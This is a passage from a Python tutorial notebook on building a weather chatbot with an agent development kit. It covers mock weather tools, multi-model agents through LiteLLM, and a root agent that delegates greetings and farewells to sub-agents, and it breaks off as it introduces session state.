Runner from google.genai import types # For creating message Content/Parts import warnings # Ignore all warnings warnings.filterwarnings("ignore") import logging logging.basicConfig(level=logging.ERROR) print("Libraries imported.") ``` ```python # @title Configure API Keys (Replace with your actual keys!) # --- IMPORTANT: Replace placeholders with your real API keys --- # Gemini API Key (Get from Google AI Studio: https://aistudio.google.com/app/apikey) os.environ["GOOGLE_API_KEY"] = "YOUR_GOOGLE_API_KEY" # <--- REPLACE # [Optional] # OpenAI API Key (Get from OpenAI Platform: https://platform.openai.com/api-keys) os.environ['OPENAI_API_KEY'] = 'YOUR_OPENAI_API_KEY' # <--- REPLACE # [Optional] # Anthropic API Key (Get from Anthropic Console: https://console.anthropic.com/settings/keys) os.environ['ANTHROPIC_API_KEY'] = 'YOUR_ANTHROPIC_API_KEY' # <--- REPLACE # --- Verify Keys (Optional Check) --- print("API Keys Set:") print(f"Google API Key set: {'Yes' if os.environ.get('GOOGLE_API_KEY') and os.environ['GOOGLE_API_KEY'] != 'YOUR_GOOGLE_API_KEY' else 'No (REPLACE PLACEHOLDER!)'}") print(f"OpenAI API Key set: {'Yes' if os.environ.get('OPENAI_API_KEY') and os.environ['OPENAI_API_KEY'] != 'YOUR_OPENAI_API_KEY' else 'No (REPLACE PLACEHOLDER!)'}") print(f"Anthropic API Key set: {'Yes' if os.environ.get('ANTHROPIC_API_KEY') and os.environ['ANTHROPIC_API_KEY'] != 'YOUR_ANTHROPIC_API_KEY' else 'No (REPLACE PLACEHOLDER!)'}") # Configure ADK to use API keys directly (not Vertex AI for this multi-model setup) os.environ["GOOGLE_GENAI_USE_VERTEXAI"] = "False" # @markdown **Security Note:** It's best practice to manage API keys securely (e.g., using Colab Secrets or environment variables) rather than hardcoding them directly in the notebook. Replace the placeholder strings above. ``` ```python # --- Define Model Constants for easier use --- # More supported models can be referenced here: https://ai.google.dev/gemini-api/docs/models#model-variations MODEL_GEMINI_2_5_FLASH = "gemini-2.5-flash" # More supported models can be referenced here: https://docs.litellm.ai/docs/providers/openai#openai-chat-completion-models MODEL_GPT_4O = "openai/gpt-4.1" # You can also try: gpt-4.1-mini, gpt-4o etc. # More supported models can be referenced here: https://docs.litellm.ai/docs/providers/anthropic MODEL_CLAUDE_SONNET = "anthropic/claude-sonnet-4-20250514" # You can also try: claude-opus-4-20250514 , claude-3-7-sonnet-20250219 etc print("\nEnvironment configured.") ``` ______________________________________________________________________ ## Step 1: Your First Agent - Basic Weather Lookup Let's begin by building the fundamental component of our Weather Bot: a single agent capable of performing a specific task – looking up weather information. This involves creating two core pieces: 1. **A Tool:** A Python function that equips the agent with the *ability* to fetch weather data. 1. **An Agent:** The AI "brain" that understands the user's request, knows it has a weather tool, and decides when and how to use it. ______________________________________________________________________ **1. Define the Tool (`get_weather`)** In ADK, **Tools** are the building blocks that give agents concrete capabilities beyond just text generation. They are typically regular Python functions that perform specific actions, like calling an API, querying a database, or performing calculations. Our first tool will provide a *mock* weather report. This allows us to focus on the agent structure without needing external API keys yet. Later, you could easily swap this mock function with one that calls a real weather service. **Key Concept: Docstrings are Crucial!** The agent's LLM relies heavily on the function's **docstring** to understand: - *What* the tool does. - *When* to use it. - *What arguments* it requires (`city: str`). - *What information* it returns. **Best Practice:** Write clear, descriptive, and accurate docstrings for your tools. This is essential for the LLM to use the tool correctly. ```python # @title Define the get_weather Tool def get_weather(city: str) -> dict: """Retrieves the current weather report for a specified city. Args: city (str): The name of the city (e.g., "New York", "London", "Tokyo"). Returns: dict: A dictionary containing the weather information. Includes a 'status' key ('success' or 'error'). If 'success', includes a 'report' key with weather details. If 'error', includes an 'error_message' key. """ print(f"--- Tool: get_weather called for city: {city} ---") # Log tool execution city_normalized = city.lower().replace(" ", "") # Basic normalization # Mock weather data mock_weather_db = { "newyork": {"status": "success", "report": "The weather in New York is sunny with a temperature of 25°C."}, "london": {"status": "success", "report": "It's cloudy in London with a temperature of 15°C."}, "tokyo": {"status": "success", "report": "Tokyo is experiencing light rain and a temperature of 18°C."}, } if city_normalized in mock_weather_db: return mock_weather_db[city_normalized] else: return {"status": "error", "error_message": f"Sorry, I don't have weather information for '{city}'."} # Example tool usage (optional test) print(get_weather("New York")) print(get_weather("Paris")) ``` ______________________________________________________________________ **2. Define the Agent (`weather_agent`)** Now, let's create the **Agent** itself. An `Agent` in ADK orchestrates the interaction between the user, the LLM, and the available tools. We configure it with several key parameters: - `name`: A unique identifier for this agent (e.g., "weather_agent_v1"). - `model`: Specifies which LLM to use (e.g., `MODEL_GEMINI_2_5_FLASH`). We'll start with a specific Gemini model. - `description`: A concise summary of the agent's overall purpose. This becomes crucial later when other agents need to decide whether to delegate tasks to *this* agent. - `instruction`: Detailed guidance for the LLM on how to behave, its persona, its goals, and specifically *how and when* to utilize its assigned `tools`. - `tools`: A list containing the actual Python tool functions the agent is allowed to use (e.g., `[get_weather]`). **Best Practice:** Provide clear and specific `instruction` prompts. The more detailed the instructions, the better the LLM can understand its role and how to use its tools effectively. Be explicit about error handling if needed. **Best Practice:** Choose descriptive `name` and `description` values. These are used internally by ADK and are vital for features like automatic delegation (covered later). ```python # @title Define the Weather Agent # Use one of the model constants defined earlier AGENT_MODEL = MODEL_GEMINI_2_5_FLASH # Starting with Gemini weather_agent = Agent( name="weather_agent_v1", model=AGENT_MODEL, # Can be a string for Gemini or a LiteLlm object description="Provides weather information for specific cities.", instruction="You are a helpful weather assistant. " "When the user asks for the weather in a specific city, " "use the 'get_weather' tool to find the information. " "If the tool returns an error, inform the user politely. " "If the tool is successful, present the weather report clearly.", tools=[get_weather], # Pass the function directly ) print(f"Agent '{weather_agent.name}' created using model '{AGENT_MODEL}'.") ``` ______________________________________________________________________ **3. Setup Runner and Session Service** To manage conversations and execute the agent, we need two more components: - `SessionService`: Responsible for managing conversation history and state for different users and sessions. The `InMemorySessionService` is a simple implementation that stores everything in memory, suitable for testing and simple applications. It keeps track of the messages exchanged. We'll explore state persistence more in Step 4. - `Runner`: The engine that orchestrates the interaction flow. It takes user input, routes it to the appropriate agent, manages calls to the LLM and tools based on the agent's logic, handles session updates via the `SessionService`, and yields events representing the progress of the interaction. ```python # @title Setup Session Service and Runner # --- Session Management --- # Key Concept: SessionService stores conversation history & state. # InMemorySessionService is simple, non-persistent storage for this tutorial. session_service = InMemorySessionService() # Define constants for identifying the interaction context APP_NAME = "weather_tutorial_app" USER_ID = "user_1" SESSION_ID = "session_001" # Using a fixed ID for simplicity # Create the specific session where the conversation will happen session = await session_service.create_session( app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID ) print(f"Session created: App='{APP_NAME}', User='{USER_ID}', Session='{SESSION_ID}'") # --- OR --- # Uncomment the following lines if running as a standard Python script (.py file): # async def init_session(app_name:str,user_id:str,session_id:str) -> InMemorySessionService: # session = await session_service.create_session( # app_name=app_name, # user_id=user_id, # session_id=session_id # ) # print(f"Session created: App='{app_name}', User='{user_id}', Session='{session_id}'") # return session # # session = asyncio.run(init_session(APP_NAME,USER_ID,SESSION_ID)) # --- Runner --- # Key Concept: Runner orchestrates the agent execution loop. runner = Runner( agent=weather_agent, # The agent we want to run app_name=APP_NAME, # Associates runs with our app session_service=session_service # Uses our session manager ) print(f"Runner created for agent '{runner.agent.name}'.") ``` ______________________________________________________________________ **4. Interact with the Agent** We need a way to send messages to our agent and receive its responses. Since LLM calls and tool executions can take time, ADK's `Runner` operates asynchronously. We'll define an `async` helper function (`call_agent_async`) that: 1. Takes a user query string. 1. Packages it into the ADK `Content` format. 1. Calls `runner.run_async`, providing the user/session context and the new message. 1. Iterates through the **Events** yielded by the runner. Events represent steps in the agent's execution (e.g., tool call requested, tool result received, intermediate LLM thought, final response). 1. Identifies and prints the **final response** event using `event.is_final_response()`. **Why `async`?** Interactions with LLMs and potentially tools (like external APIs) are I/O-bound operations. Using `asyncio` allows the program to handle these operations efficiently without blocking execution. ```python # @title Define Agent Interaction Function from google.genai import types # For creating message Content/Parts async def call_agent_async(query: str, runner, user_id, session_id): """Sends a query to the agent and prints the final response.""" print(f"\n>>> User Query: {query}") # Prepare the user's message in ADK format content = types.Content(role='user', parts=[types.Part(text=query)]) final_response_text = "Agent did not produce a final response." # Default # Key Concept: run_async executes the agent logic and yields Events. # We iterate through events to find the final answer. async for event in runner.run_async(user_id=user_id, session_id=session_id, new_message=content): # You can uncomment the line below to see *all* events during execution # print(f" [Event] Author: {event.author}, Type: {type(event).__name__}, Final: {event.is_final_response()}, Content: {event.content}") # Key Concept: is_final_response() marks the concluding message for the turn. if event.is_final_response(): if event.content and event.content.parts: # Assuming text response in the first part final_response_text = event.content.parts[0].text elif event.actions and event.actions.escalate: # Handle potential errors/escalations final_response_text = f"Agent escalated: {event.error_message or 'No specific message.'}" # Add more checks here if needed (e.g., specific error codes) break # Stop processing events once the final response is found print(f"<<< Agent Response: {final_response_text}") ``` ______________________________________________________________________ **5. Run the Conversation** Finally, let's test our setup by sending a few queries to the agent. We wrap our `async` calls in a main `async` function and run it using `await`. Watch the output: - See the user queries. - Notice the `--- Tool: get_weather called... ---` logs when the agent uses the tool. - Observe the agent's final responses, including how it handles the case where weather data isn't available (for Paris). ```python # @title Run the Initial Conversation # We need an async function to await our interaction helper async def run_conversation(): await call_agent_async("What is the weather like in London?", runner=runner, user_id=USER_ID, session_id=SESSION_ID) await call_agent_async("How about Paris?", runner=runner, user_id=USER_ID, session_id=SESSION_ID) # Expecting the tool's error message await call_agent_async("Tell me the weather in New York", runner=runner, user_id=USER_ID, session_id=SESSION_ID) # Execute the conversation using await in an async context (like Colab/Jupyter) await run_conversation() # --- OR --- # Uncomment the following lines if running as a standard Python script (.py file): # import asyncio # if __name__ == "__main__": # try: # asyncio.run(run_conversation()) # except Exception as e: # print(f"An error occurred: {e}") ``` ______________________________________________________________________ Congratulations! You've successfully built and interacted with your first ADK agent. It understands the user's request, uses a tool to find information, and responds appropriately based on the tool's result. In the next step, we'll explore how to easily switch the underlying Language Model powering this agent. ## Step 2: Going Multi-Model with LiteLLM [Optional] In Step 1, we built a functional Weather Agent powered by a specific Gemini model. While effective, real-world applications often benefit from the flexibility to use *different* Large Language Models (LLMs). Why? - **Performance:** Some models excel at specific tasks (e.g., coding, reasoning, creative writing). - **Cost:** Different models have varying price points. - **Capabilities:** Models offer diverse features, context window sizes, and fine-tuning options. - **Availability/Redundancy:** Having alternatives ensures your application remains functional even if one provider experiences issues. ADK makes switching between models seamless through its integration with the [**LiteLLM**](https://github.com/BerriAI/litellm) library. LiteLLM acts as a consistent interface to over 100 different LLMs. **In this step, we will:** 1. Learn how to configure an ADK `Agent` to use models from providers like OpenAI (GPT) and Anthropic (Claude) using the `LiteLlm` wrapper. 1. Define, configure (with their own sessions and runners), and immediately test instances of our Weather Agent, each backed by a different LLM. 1. Interact with these different agents to observe potential variations in their responses, even when using the same underlying tool. ______________________________________________________________________ **1. Import `LiteLlm`** We imported this during the initial setup (Step 0), but it's the key component for multi-model support: ```python # @title 1. Import LiteLlm from google.adk.models.lite_llm import LiteLlm ``` **2. Define and Test Multi-Model Agents** Instead of passing only a model name string (which defaults to Google's Gemini models), we wrap the desired model identifier string within the `LiteLlm` class. - **Key Concept: `LiteLlm` Wrapper:** The `LiteLlm(model="provider/model_name")` syntax tells ADK to route requests for this agent through the LiteLLM library to the specified model provider. Make sure you have configured the necessary API keys for OpenAI and Anthropic in Step 0. We'll use the `call_agent_async` function (defined earlier, which now accepts `runner`, `user_id`, and `session_id`) to interact with each agent immediately after its setup. Each block below will: - Define the agent using a specific LiteLLM model (`MODEL_GPT_4O` or `MODEL_CLAUDE_SONNET`). - Create a *new, separate* `InMemorySessionService` and session specifically for that agent's test run. This keeps the conversation histories isolated for this demonstration. - Create a `Runner` configured for the specific agent and its session service. - Immediately call `call_agent_async` to send a query and test the agent. **Best Practice:** Use constants for model names (like `MODEL_GPT_4O`, `MODEL_CLAUDE_SONNET` defined in Step 0) to avoid typos and make code easier to manage. **Error Handling:** We wrap the agent definitions in `try...except` blocks. This prevents the entire code cell from failing if an API key for a specific provider is missing or invalid, allowing the tutorial to proceed with the models that *are* configured. First, let's create and test the agent using OpenAI's GPT-4o. ```python # @title Define and Test GPT Agent # Make sure 'get_weather' function from Step 1 is defined in your environment. # Make sure 'call_agent_async' is defined from earlier. # --- Agent using GPT-4o --- weather_agent_gpt = None # Initialize to None runner_gpt = None # Initialize runner to None try: weather_agent_gpt = Agent( name="weather_agent_gpt", # Key change: Wrap the LiteLLM model identifier model=LiteLlm(model=MODEL_GPT_4O), description="Provides weather information (using GPT-4o).", instruction="You are a helpful weather assistant powered by GPT-4o. " "Use the 'get_weather' tool for city weather requests. " "Clearly present successful reports or polite error messages based on the tool's output status.", tools=[get_weather], # Re-use the same tool ) print(f"Agent '{weather_agent_gpt.name}' created using model '{MODEL_GPT_4O}'.") # InMemorySessionService is simple, non-persistent storage for this tutorial. session_service_gpt = InMemorySessionService() # Create a dedicated service # Define constants for identifying the interaction context APP_NAME_GPT = "weather_tutorial_app_gpt" # Unique app name for this test USER_ID_GPT = "user_1_gpt" SESSION_ID_GPT = "session_001_gpt" # Using a fixed ID for simplicity # Create the specific session where the conversation will happen session_gpt = await session_service_gpt.create_session( app_name=APP_NAME_GPT, user_id=USER_ID_GPT, session_id=SESSION_ID_GPT ) print(f"Session created: App='{APP_NAME_GPT}', User='{USER_ID_GPT}', Session='{SESSION_ID_GPT}'") # Create a runner specific to this agent and its session service runner_gpt = Runner( agent=weather_agent_gpt, app_name=APP_NAME_GPT, # Use the specific app name session_service=session_service_gpt # Use the specific session service ) print(f"Runner created for agent '{runner_gpt.agent.name}'.") # --- Test the GPT Agent --- print("\n--- Testing GPT Agent ---") # Ensure call_agent_async uses the correct runner, user_id, session_id await call_agent_async(query = "What's the weather in Tokyo?", runner=runner_gpt, user_id=USER_ID_GPT, session_id=SESSION_ID_GPT) # --- OR --- # Uncomment the following lines if running as a standard Python script (.py file): # import asyncio # if __name__ == "__main__": # try: # asyncio.run(call_agent_async(query = "What's the weather in Tokyo?", # runner=runner_gpt, # user_id=USER_ID_GPT, # session_id=SESSION_ID_GPT) # except Exception as e: # print(f"An error occurred: {e}") except Exception as e: print(f"❌ Could not create or run GPT agent '{MODEL_GPT_4O}'. Check API Key and model name. Error: {e}") ``` Next, we'll do the same for Anthropic's Claude Sonnet. ```python # @title Define and Test Claude Agent # Make sure 'get_weather' function from Step 1 is defined in your environment. # Make sure 'call_agent_async' is defined from earlier. # --- Agent using Claude Sonnet --- weather_agent_claude = None # Initialize to None runner_claude = None # Initialize runner to None try: weather_agent_claude = Agent( name="weather_agent_claude", # Key change: Wrap the LiteLLM model identifier model=LiteLlm(model=MODEL_CLAUDE_SONNET), description="Provides weather information (using Claude Sonnet).", instruction="You are a helpful weather assistant powered by Claude Sonnet. " "Use the 'get_weather' tool for city weather requests. " "Analyze the tool's dictionary output ('status', 'report'/'error_message'). " "Clearly present successful reports or polite error messages.", tools=[get_weather], # Re-use the same tool ) print(f"Agent '{weather_agent_claude.name}' created using model '{MODEL_CLAUDE_SONNET}'.") # InMemorySessionService is simple, non-persistent storage for this tutorial. session_service_claude = InMemorySessionService() # Create a dedicated service # Define constants for identifying the interaction context APP_NAME_CLAUDE = "weather_tutorial_app_claude" # Unique app name USER_ID_CLAUDE = "user_1_claude" SESSION_ID_CLAUDE = "session_001_claude" # Using a fixed ID for simplicity # Create the specific session where the conversation will happen session_claude = await session_service_claude.create_session( app_name=APP_NAME_CLAUDE, user_id=USER_ID_CLAUDE, session_id=SESSION_ID_CLAUDE ) print(f"Session created: App='{APP_NAME_CLAUDE}', User='{USER_ID_CLAUDE}', Session='{SESSION_ID_CLAUDE}'") # Create a runner specific to this agent and its session service runner_claude = Runner( agent=weather_agent_claude, app_name=APP_NAME_CLAUDE, # Use the specific app name session_service=session_service_claude # Use the specific session service ) print(f"Runner created for agent '{runner_claude.agent.name}'.") # --- Test the Claude Agent --- print("\n--- Testing Claude Agent ---") # Ensure call_agent_async uses the correct runner, user_id, session_id await call_agent_async(query = "Weather in London please.", runner=runner_claude, user_id=USER_ID_CLAUDE, session_id=SESSION_ID_CLAUDE) # --- OR --- # Uncomment the following lines if running as a standard Python script (.py file): # import asyncio # if __name__ == "__main__": # try: # asyncio.run(call_agent_async(query = "Weather in London please.", # runner=runner_claude, # user_id=USER_ID_CLAUDE, # session_id=SESSION_ID_CLAUDE) # except Exception as e: # print(f"An error occurred: {e}") except Exception as e: print(f"❌ Could not create or run Claude agent '{MODEL_CLAUDE_SONNET}'. Check API Key and model name. Error: {e}") ``` Observe the output carefully from both code blocks. You should see: 1. Each agent (`weather_agent_gpt`, `weather_agent_claude`) is created successfully (if API keys are valid). 1. A dedicated session and runner are set up for each. 1. Each agent correctly identifies the need to use the `get_weather` tool when processing the query (you'll see the `--- Tool: get_weather called... ---` log). 1. The *underlying tool logic* remains identical, always returning our mock data. 1. However, the **final textual response** generated by each agent might differ slightly in phrasing, tone, or formatting. This is because the instruction prompt is interpreted and executed by different LLMs (GPT-4o vs. Claude Sonnet). This step demonstrates the power and flexibility ADK + LiteLLM provide. You can easily experiment with and deploy agents using various LLMs while keeping your core application logic (tools, fundamental agent structure) consistent. In the next step, we'll move beyond a single agent and build a small team where agents can delegate tasks to each other! ______________________________________________________________________ ## Step 3: Building an Agent Team - Delegation for Greetings & Farewells In Steps 1 and 2, we built and experimented with a single agent focused solely on weather lookups. While effective for its specific task, real-world applications often involve handling a wider variety of user interactions. We *could* keep adding more tools and complex instructions to our single weather agent, but this can quickly become unmanageable and less efficient. A more robust approach is to build an **Agent Team**. This involves: 1. Creating multiple, **specialized agents**, each designed for a specific capability (e.g., one for weather, one for greetings, one for calculations). 1. Designating a **root agent** (or orchestrator) that receives the initial user request. 1. Enabling the root agent to **delegate** the request to the most appropriate specialized sub-agent based on the user's intent. **Why build an Agent Team?** - **Modularity:** Easier to develop, test, and maintain individual agents. - **Specialization:** Each agent can be fine-tuned (instructions, model choice) for its specific task. - **Scalability:** Simpler to add new capabilities by adding new agents. - **Efficiency:** Allows using potentially simpler/cheaper models for simpler tasks (like greetings). **In this step, we will:** 1. Define simple tools for handling greetings (`say_hello`) and farewells (`say_goodbye`). 1. Create two new specialized sub-agents: `greeting_agent` and `farewell_agent`. 1. Update our main weather agent (`weather_agent_v2`) to act as the **root agent**. 1. Configure the root agent with its sub-agents, enabling **automatic delegation**. 1. Test the delegation flow by sending different types of requests to the root agent. ______________________________________________________________________ **1. Define Tools for Sub-Agents** First, let's create the simple Python functions that will serve as tools for our new specialist agents. Remember, clear docstrings are vital for the agents that will use them. ```python # @title Define Tools for Greeting and Farewell Agents from typing import Optional # Make sure to import Optional # Ensure 'get_weather' from Step 1 is available if running this step independently. # def get_weather(city: str) -> dict: ... (from Step 1) def say_hello(name: Optional[str] = None) -> str: """Provides a simple greeting. If a name is provided, it will be used. Args: name (str, optional): The name of the person to greet. Defaults to a generic greeting if not provided. Returns: str: A friendly greeting message. """ if name: greeting = f"Hello, {name}!" print(f"--- Tool: say_hello called with name: {name} ---") else: greeting = "Hello there!" # Default greeting if name is None or not explicitly passed print(f"--- Tool: say_hello called without a specific name (name_arg_value: {name}) ---") return greeting def say_goodbye() -> str: """Provides a simple farewell message to conclude the conversation.""" print(f"--- Tool: say_goodbye called ---") return "Goodbye! Have a great day." print("Greeting and Farewell tools defined.") # Optional self-test print(say_hello("Alice")) print(say_hello()) # Test with no argument (should use default "Hello there!") print(say_hello(name=None)) # Test with name explicitly as None (should use default "Hello there!") ``` ______________________________________________________________________ **2. Define the Sub-Agents (Greeting & Farewell)** Now, create the `Agent` instances for our specialists. Notice their highly focused `instruction` and, critically, their clear `description`. The `description` is the primary information the *root agent* uses to decide *when* to delegate to these sub-agents. **Best Practice:** Sub-agent `description` fields should accurately and concisely summarize their specific capability. This is crucial for effective automatic delegation. **Best Practice:** Sub-agent `instruction` fields should be tailored to their limited scope, telling them exactly what to do and *what not* to do (e.g., "Your *only* task is..."). ```python # @title Define Greeting and Farewell Sub-Agents # If you want to use models other than Gemini, Ensure LiteLlm is imported and API keys are set (from Step 0/2) # from google.adk.models.lite_llm import LiteLlm # MODEL_GPT_4O, MODEL_CLAUDE_SONNET etc. should be defined # Or else, continue to use: model = MODEL_GEMINI_2_5_FLASH # --- Greeting Agent --- greeting_agent = None try: greeting_agent = Agent( # Using a potentially different/cheaper model for a simple task model = MODEL_GEMINI_2_5_FLASH, # model=LiteLlm(model=MODEL_GPT_4O), # If you would like to experiment with other models name="greeting_agent", instruction="You are the Greeting Agent. Your ONLY task is to provide a friendly greeting to the user. " "Use the 'say_hello' tool to generate the greeting. " "If the user provides their name, make sure to pass it to the tool. " "Do not engage in any other conversation or tasks.", description="Handles simple greetings and hellos using the 'say_hello' tool.", # Crucial for delegation tools=[say_hello], ) print(f"✅ Agent '{greeting_agent.name}' created using model '{greeting_agent.model}'.") except Exception as e: print(f"❌ Could not create Greeting agent. Check API Key ({greeting_agent.model}). Error: {e}") # --- Farewell Agent --- farewell_agent = None try: farewell_agent = Agent( # Can use the same or a different model model = MODEL_GEMINI_2_5_FLASH, # model=LiteLlm(model=MODEL_GPT_4O), # If you would like to experiment with other models name="farewell_agent", instruction="You are the Farewell Agent. Your ONLY task is to provide a polite goodbye message. " "Use the 'say_goodbye' tool when the user indicates they are leaving or ending the conversation " "(e.g., using words like 'bye', 'goodbye', 'thanks bye', 'see you'). " "Do not perform any other actions.", description="Handles simple farewells and goodbyes using the 'say_goodbye' tool.", # Crucial for delegation tools=[say_goodbye], ) print(f"✅ Agent '{farewell_agent.name}' created using model '{farewell_agent.model}'.") except Exception as e: print(f"❌ Could not create Farewell agent. Check API Key ({farewell_agent.model}). Error: {e}") ``` ______________________________________________________________________ **3. Define the Root Agent (Weather Agent v2) with Sub-Agents** Now, we upgrade our `weather_agent`. The key changes are: - Adding the `sub_agents` parameter: We pass a list containing the `greeting_agent` and `farewell_agent` instances we just created. - Updating the `instruction`: We explicitly tell the root agent *about* its sub-agents and *when* it should delegate tasks to them. **Key Concept: Automatic Delegation (Auto Flow)** By providing the `sub_agents` list, ADK enables automatic delegation. When the root agent receives a user query, its LLM considers not only its own instructions and tools but also the `description` of each sub-agent. If the LLM determines that a query aligns better with a sub-agent's described capability (e.g., "Handles simple greetings"), it will automatically generate a special internal action to *transfer control* to that sub-agent for that turn. The sub-agent then processes the query using its own model, instructions, and tools. **Best Practice:** Ensure the root agent's instructions clearly guide its delegation decisions. Mention the sub-agents by name and describe the conditions under which delegation should occur. ```python # @title Define the Root Agent with Sub-Agents # Ensure sub-agents were created successfully before defining the root agent. # Also ensure the original 'get_weather' tool is defined. root_agent = None runner_root = None # Initialize runner if greeting_agent and farewell_agent and 'get_weather' in globals(): # Let's use a capable Gemini model for the root agent to handle orchestration root_agent_model = MODEL_GEMINI_2_5_FLASH weather_agent_team = Agent( name="weather_agent_v2", # Give it a new version name model=root_agent_model, description="The main coordinator agent. Handles weather requests and delegates greetings/farewells to specialists.", instruction="You are the main Weather Agent coordinating a team. Your primary responsibility is to provide weather information. " "Use the 'get_weather' tool ONLY for specific weather requests (e.g., 'weather in London'). " "You have specialized sub-agents: " "1. 'greeting_agent': Handles simple greetings like 'Hi', 'Hello'. Delegate to it for these. " "2. 'farewell_agent': Handles simple farewells like 'Bye', 'See you'. Delegate to it for these. " "Analyze the user's query. If it's a greeting, delegate to 'greeting_agent'. If it's a farewell, delegate to 'farewell_agent'. " "If it's a weather request, handle it yourself using 'get_weather'. " "For anything else, respond appropriately or state you cannot handle it.", tools=[get_weather], # Root agent still needs the weather tool for its core task # Key change: Link the sub-agents here! sub_agents=[greeting_agent, farewell_agent] ) print(f"✅ Root Agent '{weather_agent_team.name}' created using model '{root_agent_model}' with sub-agents: {[sa.name for sa in weather_agent_team.sub_agents]}") else: print("❌ Cannot create root agent because one or more sub-agents failed to initialize or 'get_weather' tool is missing.") if not greeting_agent: print(" - Greeting Agent is missing.") if not farewell_agent: print(" - Farewell Agent is missing.") if 'get_weather' not in globals(): print(" - get_weather function is missing.") ``` ______________________________________________________________________ **4. Interact with the Agent Team** Now that we've defined our root agent (`weather_agent_team` - *Note: Ensure this variable name matches the one defined in the previous code block, likely `# @title Define the Root Agent with Sub-Agents`, which might have named it `root_agent`*) with its specialized sub-agents, let's test the delegation mechanism. The following code block will: 1. Define an `async` function `run_team_conversation`. 1. Inside this function, create a *new, dedicated* `InMemorySessionService` and a specific session (`session_001_agent_team`) just for this test run. This isolates the conversation history for testing the team dynamics. 1. Create a `Runner` (`runner_agent_team`) configured to use our `weather_agent_team` (the root agent) and the dedicated session service. 1. Use our updated `call_agent_async` function to send different types of queries (greeting, weather request, farewell) to the `runner_agent_team`. We explicitly pass the runner, user ID, and session ID for this specific test. 1. Immediately execute the `run_team_conversation` function. We expect the following flow: 1. The "Hello there!" query goes to `runner_agent_team`. 1. The root agent (`weather_agent_team`) receives it and, based on its instructions and the `greeting_agent`'s description, delegates the task. 1. `greeting_agent` handles the query, calls its `say_hello` tool, and generates the response. 1. The "What is the weather in New York?" query is *not* delegated and is handled directly by the root agent using its `get_weather` tool. 1. The "Thanks, bye!" query is delegated to the `farewell_agent`, which uses its `say_goodbye` tool. ```python # @title Interact with the Agent Team import asyncio # Ensure asyncio is imported # Ensure the root agent (e.g., 'weather_agent_team' or 'root_agent' from the previous cell) is defined. # Ensure the call_agent_async function is defined. # Check if the root agent variable exists before defining the conversation function root_agent_var_name = 'root_agent' # Default name from Step 3 guide if 'weather_agent_team' in globals(): # Check if user used this name instead root_agent_var_name = 'weather_agent_team' elif 'root_agent' not in globals(): print("⚠️ Root agent ('root_agent' or 'weather_agent_team') not found. Cannot define run_team_conversation.") # Assign a dummy value to prevent NameError later if the code block runs anyway root_agent = None # Or set a flag to prevent execution # Only define and run if the root agent exists if root_agent_var_name in globals() and globals()[root_agent_var_name]: # Define the main async function for the conversation logic. # The 'await' keywords INSIDE this function are necessary for async operations. async def run_team_conversation(): print("\n--- Testing Agent Team Delegation ---") session_service = InMemorySessionService() APP_NAME = "weather_tutorial_agent_team" USER_ID = "user_1_agent_team" SESSION_ID = "session_001_agent_team" session = await session_service.create_session( app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID ) print(f"Session created: App='{APP_NAME}', User='{USER_ID}', Session='{SESSION_ID}'") actual_root_agent = globals()[root_agent_var_name] runner_agent_team = Runner( # Or use InMemoryRunner agent=actual_root_agent, app_name=APP_NAME, session_service=session_service ) print(f"Runner created for agent '{actual_root_agent.name}'.") # --- Interactions using await (correct within async def) --- await call_agent_async(query = "Hello there!", runner=runner_agent_team, user_id=USER_ID, session_id=SESSION_ID) await call_agent_async(query = "What is the weather in New York?", runner=runner_agent_team, user_id=USER_ID, session_id=SESSION_ID) await call_agent_async(query = "Thanks, bye!", runner=runner_agent_team, user_id=USER_ID, session_id=SESSION_ID) # --- Execute the `run_team_conversation` async function --- # Choose ONE of the methods below based on your environment. # Note: This may require API keys for the models used! # METHOD 1: Direct await (Default for Notebooks/Async REPLs) # If your environment supports top-level await (like Colab/Jupyter notebooks), # it means an event loop is already running, so you can directly await the function. print("Attempting execution using 'await' (default for notebooks)...") await run_team_conversation() # METHOD 2: asyncio.run (For Standard Python Scripts [.py]) # If running this code as a standard Python script from your terminal, # the script context is synchronous. `asyncio.run()` is needed to # create and manage an event loop to execute your async function. # To use this method: # 1. Comment out the `await run_team_conversation()` line above. # 2. Uncomment the following block: """ import asyncio if __name__ == "__main__": # Ensures this runs only when script is executed directly print("Executing using 'asyncio.run()' (for standard Python scripts)...") try: # This creates an event loop, runs your async function, and closes the loop. asyncio.run(run_team_conversation()) except Exception as e: print(f"An error occurred: {e}") """ else: # This message prints if the root agent variable wasn't found earlier print("\n⚠️ Skipping agent team conversation execution as the root agent was not successfully defined in a previous step.") ``` ______________________________________________________________________ Look closely at the output logs, especially the `--- Tool: ... called ---` messages. You should observe: - For "Hello there!", the `say_hello` tool was called (indicating `greeting_agent` handled it). - For "What is the weather in New York?", the `get_weather` tool was called (indicating the root agent handled it). - For "Thanks, bye!", the `say_goodbye` tool was called (indicating `farewell_agent` handled it). This confirms successful **automatic delegation**! The root agent, guided by its instructions and the `description`s of its `sub_agents`, correctly routed user requests to the appropriate specialist agent within the team. You've now structured your application with multiple collaborating agents. This modular design is fundamental for building more complex and capable agent systems. In the next step, we'll give our agents the ability to remember information across turns using session state. ## Step 4: Adding Memory and Personalization with Session State So far, our agent team can handle different tasks through delegation, but each interaction starts fresh – the agents have no memory of past conversations or user preferences within a session. To create more sophisticated and context-aware experiences, agents need **memory**. ADK provides this through **Session State**. **What is Session State?** - It's a Python dictionary (`session.state`) tied to a specific user session (identified by `APP_NAME`, `USER_ID`, `SESSION_ID`). - It persists information *across multiple conversational turns* within that session. - Agents and Tools can read from and write to this state, allowing them to remember details, adapt behavior, and personalize responses. **How Agents Interact with State:** 1. **`ToolContext` (Primary Method):** Tools can accept a `ToolContext` object (automatically provided by ADK if declared as the last argument). This object gives direct access to the session state via `tool_context.state`, allowing tools to read preferences or save results *during* execution. 1. **`output_key` (Auto-Save Agent Response):** An `Agent` can be configured with an `output_key="your_key"`. ADK will then automatically save the agent's final textual response for a turn into `session.state["your_key"]`. **In this step, we will enhance our Weather Bot team by:** 1. Using a **new** `InMemorySessionService` to demonstrate state in isolation. 1. Initializing session state with a user preference for `temperature_unit`. 1. Creating a state-aware version of the weather tool (`get_weather_stateful`) that reads this preference via `ToolContext` and adjusts its output format (Celsius/Fahrenheit). 1. Updating the root agent to use this stateful tool and configuring it with an `output_key` to automatically save its final weather report to the session state. 1. Running a conversation to observe how the initial state affects the tool, how manual state changes alter subsequent behavior, and how `output_key` persists the agent's response. ______________________________________________________________________ **1. Initialize New Session Service and State** To clearly 